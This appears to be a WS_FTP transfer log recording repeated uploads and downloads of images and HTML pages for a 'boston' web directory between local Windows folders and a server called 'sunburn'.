10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
